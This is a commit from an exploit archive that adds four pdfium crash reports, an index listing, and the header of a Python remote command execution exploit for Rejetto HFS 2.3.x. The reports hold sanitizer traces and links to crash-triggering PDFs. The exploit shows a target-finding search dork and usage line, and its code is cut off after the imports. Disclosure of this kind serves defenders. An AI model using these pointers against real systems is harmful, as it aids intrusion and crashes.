DB: 2016-01-05

5 new exploits
2016-01-05 05:03:47 +00:00 · 2016-01-05 05:03:47 +00:00 · 19f864b3ca
commit 19f864b3ca
parent 5aeeaef0a2
6 changed files with 375 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35406,3 +35406,8 @@ id,file,description,date,author,platform,type,port
 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
 39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
 39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
 39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
 39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0
 39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack-Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0
--- a/platforms/multiple/dos/39162.txt
+++ b/platforms/multiple/dos/39162.txt
@ -0,0 +1,96 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=625
 The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
 --- cut ---
 $ ./pdfium_test asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6 
 Rendering PDF file asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6.
 Non-linearized path...
 =================================================================
 ==28672==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800000f7b2 at pc 0x000000ed2cac bp 0x7ffea0af5970 sp 0x7ffea0af5968
 READ of size 1 at 0x61800000f7b2 thread T0
    #0 0xed2cab in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64
    #1 0xece99e in CPDF_DIBSource::DownSampleScanline(int, unsigned char*, int, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1277:5
    #2 0x115235c in CFX_ImageStretcher::ContinueQuickStretch(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:910:5
    #3 0x1151805 in CFX_ImageStretcher::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:834:12
    #4 0x11831f8 in CFX_ImageTransformer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_transform.cpp:409:7
    #5 0x117a4a1 in CFX_ImageRenderer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_main.cpp:1637:9
    #6 0x10986a2 in CFX_AggDeviceDriver::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/agg/src/fx_agg_driver.cpp:1748:10
    #7 0x11a32f1 in CFX_RenderDevice::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/ge/fx_ge_device.cpp:471:10
    #8 0xe8f1f1 in CPDF_ImageRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:869:12
    #9 0xe673bf in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:299:9
    #10 0xe67eff in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:328:12
    #11 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #12 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #13 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #14 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #15 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #16 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #17 0x4f16e9 in main samples/pdfium_test.cc:608:5
 0x61800000f7b2 is located 0 bytes to the right of 818-byte region [0x61800000f480,0x61800000f7b2)
 allocated by thread T0 here:
    #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
    #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22
    #2 0xe1c1d6 in CPDF_SyntaxParser::ReadStream(CPDF_Dictionary*, PARSE_CONTEXT*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2444:13
    #3 0xe06543 in CPDF_SyntaxParser::GetObject(CPDF_IndirectObjects*, unsigned int, unsigned int, PARSE_CONTEXT*, int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2171:12
    #4 0xe071a4 in CPDF_Parser::ParseIndirectObjectAt(CPDF_IndirectObjects*, long, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1400:7
    #5 0xe0897f in CPDF_Parser::ParseIndirectObject(CPDF_IndirectObjects*, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1195:12
    #6 0xdd7c93 in CPDF_IndirectObjects::GetIndirectObject(unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:1125:12
    #7 0xddafdf in CPDF_Object::GetDirect() const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:220:10
    #8 0xde4960 in CPDF_Dictionary::GetElementValue(CFX_ByteStringC const&) const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:594:14
    #9 0xd99b9b in CPDF_StreamContentParser::FindResourceObj(CFX_ByteStringC const&, CFX_ByteString const&) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1178:25
    #10 0xd8d60c in CPDF_StreamContentParser::Handle_ExecuteXObject() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:696:36
    #11 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
    #12 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
    #13 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
    #14 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
    #15 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
    #16 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
    #17 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
    #18 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #19 0x4f16e9 in main samples/pdfium_test.cc:608:5
 SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64 in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const
 Shadow bytes around the buggy address:
  0x0c307fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0c307fff9ef0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa
  0x0c307fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fff9f10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c307fff9f20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c307fff9f30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c307fff9f40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==28672==ABORTING
 --- cut ---
 The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554151. Attached are two PDF files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39162.zip
--- a/platforms/multiple/dos/39163.txt
+++ b/platforms/multiple/dos/39163.txt
@ -0,0 +1,84 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=623
 The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
 --- cut ---
 $ ./pdfium_test asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74 
 Rendering PDF file asan_heap-oob_b4a7e0_7134_a91748c99d169425fc39c76197d7cd74.
 Non-linearized path...
 =================================================================
 ==27153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000794c at pc 0x000000cfaaef bp 0x7ffd89a11070 sp 0x7ffd89a11068
 READ of size 4 at 0x60700000794c thread T0
    #0 0xcfaaee in CPDF_TextObject::CalcPositionData(float*, float*, float, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17
    #1 0xda18a4 in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1301:3
    #2 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3
    #3 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
    #4 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
    #5 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
    #6 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
    #7 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
    #8 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
    #9 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
    #10 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #11 0x4f16e9 in main samples/pdfium_test.cc:608:5
 0x60700000794c is located 4 bytes to the left of 72-byte region [0x607000007950,0x607000007998)
 allocated by thread T0 here:
    #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
    #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22
    #2 0xcf6db6 in CPDF_TextObject::SetSegments(CFX_ByteString const*, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:233:18
    #3 0xda150f in CPDF_StreamContentParser::AddTextObject(CFX_ByteString*, float, float*, int) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1296:3
    #4 0xd919e7 in CPDF_StreamContentParser::Handle_ShowText() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1330:3
    #5 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7
    #6 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9
    #7 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13
    #8 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3
    #9 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3
    #10 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3
    #11 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20
    #12 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #13 0x4f16e9 in main samples/pdfium_test.cc:608:5
 SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page.cpp:411:17 in CPDF_TextObject::CalcPositionData(float*, float*, float, int)
 Shadow bytes around the buggy address:
  0x0c0e7fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
 =>0x0c0e7fff8f20: fa fa fa fa fa fa fa fa fa[fa]00 00 00 00 00 00
  0x0c0e7fff8f30: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0e7fff8f40: 00 04 fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
  0x0c0e7fff8f50: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c0e7fff8f60: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0e7fff8f70: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fd fd
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==27153==ABORTING
 --- cut ---
 The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554115. Attached is the PDF file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39163.zip
--- a/platforms/multiple/dos/39164.txt
+++ b/platforms/multiple/dos/39164.txt
@ -0,0 +1,59 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=622
 The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
 --- cut ---
 ==31710==ERROR: AddressSanitizer: SEGV on unknown address 0x7f53cc100009 (pc 0x0000016fafe2 bp 0x7ffee170d730 sp 0x7ffee170d6b0 T0)
    #0 0x16fafe1 in IsFlagSet v8/src/heap/spaces.h:548:13
    #1 0x16fafe1 in IsEvacuationCandidate v8/src/heap/spaces.h:689
    #2 0x16fafe1 in RecordSlot v8/src/heap/mark-compact-inl.h:62
    #3 0x16fafe1 in VisitPointers v8/src/heap/incremental-marking.cc:320
    #4 0x16fafe1 in v8::internal::StaticMarkingVisitor<v8::internal::IncrementalMarkingMarkingVisitor>::VisitPropertyCell(v8::internal::Map*, v8::internal::HeapObject*) v8/src/heap/objects-visiting-inl.h:341
    #5 0x16ed00a in IterateBody v8/src/heap/objects-visiting.h:355:5
    #6 0x16ed00a in VisitObject v8/src/heap/incremental-marking.cc:732
    #7 0x16ed00a in ProcessMarkingDeque v8/src/heap/incremental-marking.cc:769
    #8 0x16ed00a in v8::internal::IncrementalMarking::Step(long, v8::internal::IncrementalMarking::CompletionAction, v8::internal::IncrementalMarking::ForceMarkingAction, v8::internal::IncrementalMarking::ForceCompletionAction) v8/src/heap/incremental-marking.cc:1098
    #9 0x1836243 in InlineAllocationStep v8/src/heap/spaces.h:2537:7
    #10 0x1836243 in InlineAllocationStep v8/src/heap/spaces.cc:1636
    #11 0x1836243 in v8::internal::NewSpace::EnsureAllocation(int, v8::internal::AllocationAlignment) v8/src/heap/spaces.cc:1597
    #12 0x16028a2 in AllocateRawUnaligned v8/src/heap/spaces-inl.h:456:10
    #13 0x16028a2 in AllocateRaw v8/src/heap/spaces-inl.h:480
    #14 0x16028a2 in v8::internal::Heap::AllocateRaw(int, v8::internal::AllocationSpace, v8::internal::AllocationAlignment) v8/src/heap/heap-inl.h:215
    #15 0x16960d7 in v8::internal::Heap::AllocateFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/heap/heap.cc:2119:35
    #16 0x159a4a2 in v8::internal::Factory::NewFillerObject(int, bool, v8::internal::AllocationSpace) v8/src/factory.cc:79:3
    #17 0x25834ee in __RT_impl_Runtime_AllocateInTargetSpace v8/src/runtime/runtime-internal.cc:246:11
    #18 0x25834ee in v8::internal::Runtime_AllocateInTargetSpace(int, v8::internal::Object**, v8::internal::Isolate*) v8/src/runtime/runtime-internal.cc:236
    #7 0x7f53d03063d7  (<unknown module>)
    #8 0x7f53d040f273  (<unknown module>)
    #9 0x7f53d040ad4d  (<unknown module>)
    #10 0x7f53d0336da3  (<unknown module>)
    #11 0x7f53d031a8e1  (<unknown module>)
    #19 0x158a09f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>) v8/src/execution.cc:98:13
    #20 0x158882d in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:167:10
    #21 0xf6e33e in v8::Script::Run(v8::Local<v8::Context>) v8/src/api.cc:1743:23
    #22 0xebf5cb in FXJS_Execute(v8::Isolate*, IJS_Context*, wchar_t const*, FXJSErr*) third_party/pdfium/fpdfsdk/src/jsapi/fxjs_v8.cpp:384:8
    #23 0xe3cc12 in CJS_Runtime::Execute(IJS_Context*, wchar_t const*, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Runtime.cpp:188:14
    #24 0xf54991 in CJS_Context::RunScript(CFX_WideString const&, CFX_WideString*) third_party/pdfium/fpdfsdk/src/javascript/JS_Context.cpp:59:12
    #25 0x553134 in CPDFSDK_InterForm::OnFormat(CPDF_FormField*, int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:1822:24
    #26 0x552b8c in CPDFSDK_Widget::OnFormat(int&) third_party/pdfium/fpdfsdk/src/fsdk_baseform.cpp:330:10
    #27 0x584be9 in CPDFSDK_BFAnnotHandler::OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:593:31
    #28 0x57e44a in CPDFSDK_AnnotHandlerMgr::Annot_OnLoad(CPDFSDK_Annot*) third_party/pdfium/fpdfsdk/src/fsdk_annothandler.cpp:94:5
    #29 0x574f67 in CPDFSDK_PageView::LoadFXAnnots() third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:886:5
    #30 0x573c36 in CPDFSDK_Document::GetPageView(CPDF_Page*, int) third_party/pdfium/fpdfsdk/src/fsdk_mgr.cpp:420:3
    #31 0x528ec3 in FormHandleToPageView third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:32:20
    #32 0x528ec3 in FORM_OnAfterLoadPage third_party/pdfium/fpdfsdk/src/fpdfformfill.cpp:263
    #33 0x4da9c2 in RenderPage(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, void* const&, void* const&, int, Options const&) third_party/pdfium/samples/pdfium_test.cc:346:3
    #34 0x4dd558 in RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, Options const&) third_party/pdfium/samples/pdfium_test.cc:520:9
    #35 0x4de3d1 in main third_party/pdfium/samples/pdfium_test.cc:597:5
    #36 0x7f553e1c4ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
 AddressSanitizer can not provide additional info.
 SUMMARY: AddressSanitizer: SEGV (pdfium_test+0x16fafe1)
 ==31710==ABORTING
 --- cut ---
 The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554099. Attached is the PDF file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39164.zip
--- a/platforms/multiple/dos/39165.txt
+++ b/platforms/multiple/dos/39165.txt
@ -0,0 +1,84 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=612
 The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
 --- cut ---
 $ ./pdfium_test asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8 
 Rendering PDF file asan_stack-oob_b9a750_1372_52559cc9c86b4bc0fb43218c7f69c5c8.
 Non-linearized path...
 =================================================================
 ==22207==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8b7edb84 at pc 0x000000d6f064 bp 0x7ffc8b7ed8c0 sp 0x7ffc8b7ed8b8
 READ of size 4 at 0x7ffc8b7edb84 thread T0
    #0 0xd6f063 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9
    #1 0xd6ecd2 in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:808:3
    #2 0xd6f6a7 in CPDF_Function::Call(float*, int, float*, int&) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:902:3
    #3 0xedbc22 in DrawFuncShading(CFX_DIBitmap*, CFX_Matrix*, CPDF_Dictionary*, CPDF_Function**, int, CPDF_ColorSpace*, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:293:15
    #4 0xeda3c0 in CPDF_RenderStatus::DrawShading(CPDF_ShadingPattern*, CFX_Matrix*, FX_RECT&, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:875:7
    #5 0xee45b9 in CPDF_RenderStatus::ProcessShading(CPDF_ShadingObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render_pattern.cpp:954:3
    #6 0xe6700d in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:399:14
    #7 0xe61f6d in CPDF_RenderStatus::RenderSingleObject(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:292:3
    #8 0xe618c1 in CPDF_RenderStatus::RenderObjectList(CPDF_PageObjects const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:269:5
    #9 0xe6bc26 in CPDF_RenderStatus::ProcessForm(CPDF_FormObject*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:485:3
    #10 0xe6704c in CPDF_RenderStatus::ProcessObjectNoClip(CPDF_PageObject const*, CFX_Matrix const*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:402:14
    #11 0xe67f47 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:330:3
    #12 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #13 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #14 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #15 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #16 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #17 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #18 0x4f16e9 in main samples/pdfium_test.cc:608:5
 Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
    #0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795
  This frame has 2 object(s):
    [32, 36) 'input' <== Memory access at offset 36 overflows this variable
    [48, 52) 'nresults'
 HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
 SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
 Shadow bytes around the buggy address:
  0x1000116f5b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
 =>0x1000116f5b70:[04]f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000116f5bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==22207==ABORTING
 --- cut ---
 While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
 The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39165.zip
--- a/platforms/windows/remote/39161.py
+++ b/platforms/windows/remote/39161.py
@ -0,0 +1,47 @@
 #!/usr/bin/python
 # Exploit Title: HttpFileServer 2.3.x Remote Command Execution
 # Google Dork: intext:"httpfileserver 2.3"
 # Date: 04-01-2016
 # Remote: Yes
 # Exploit Author: Avinash Kumar Thapa aka "-Acid"
 # Vendor Homepage: http://rejetto.com/
 # Software Link: http://sourceforge.net/projects/hfs/
 # Version: 2.3.x
 # Tested on: Windows Server 2008 , Windows 8, Windows 7
 # CVE : CVE-2014-6287
 # Description: You can use HFS (HTTP File Server) to send and receive files.
 #	       It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
 #	       It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
 #Usage : python Exploit.py <Target IP address> <Target Port Number>
 import urllib2
 import sys
 try:
